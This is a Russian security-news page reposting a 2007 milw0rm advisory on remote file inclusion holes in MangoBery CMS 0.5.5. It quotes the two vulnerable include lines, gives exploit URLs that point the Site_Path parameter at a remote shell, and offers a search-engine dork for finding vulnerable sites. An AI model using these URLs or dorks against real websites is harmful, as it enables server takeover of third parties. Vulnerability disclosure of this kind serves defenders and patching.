Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Eve-NukePortal file include (phpbb_root_path)

  codebb 1.1b3  (phpbb_root_path
)Remote File Include Vulnerability

  Kaqoo Auction (install_root)
Multiple Remote File Include Vulnerabilities

  JC URLshrink 1.3.1 Remote Code Execution Vulnerability

From:kezzap66345 <kezzap66345_(at)_hotmail.com>
Date:2 апреля 2007 г.
Subject:MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability

Mangobery-0.5.5

*****************
Found by kezzap66345 *
*****************
Script Page:http://mangobery.sourceforge.net/
*****************
Demo Site:http://mangobery.beryllium.ca/
*****************
Script
Download:
http://sourceforge.net/project/showfiles.php?group_id=63834&package_id=60858



*****************
Dork:
http://www.google.com.tr/search?hl=tr&q=%22MangoBery+1.0+Alpha%22&
meta=


*****************
ERROR#1:
File:boxes/quotes.php
*****************


<? include($Site_Path . 'tquotes/tq_getquote.inc') ?>     <<< rfi coded


*********************************************************************************
*****
RFI#1:

http://SITE.com/path/boxes/quotes.php?Site_Path=[SHELL]


*********************************************************************************
*****

*****************
ERROR#2:
File:templates/mangobery/footer.sample.php
*****************


include($Site_Path . "includes/column_right.php");     <<< rfi coded


*********************************************************************************
*****
RFI#2:

http://SITE.com/path/templates/mangobery/footer.sample.php?Site_Path=[SHELL]

Thanks:Siircicocuk and x0r0n
*********************************************************************************
*****
*********************************************************************************
*****
*********************************************************************************
*****
*********************************************************************************
*****
******Thanx****SiiRCiCOCUK****str0ke*********************************************
*****

# milw0rm.com [2007-03-28]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru
test server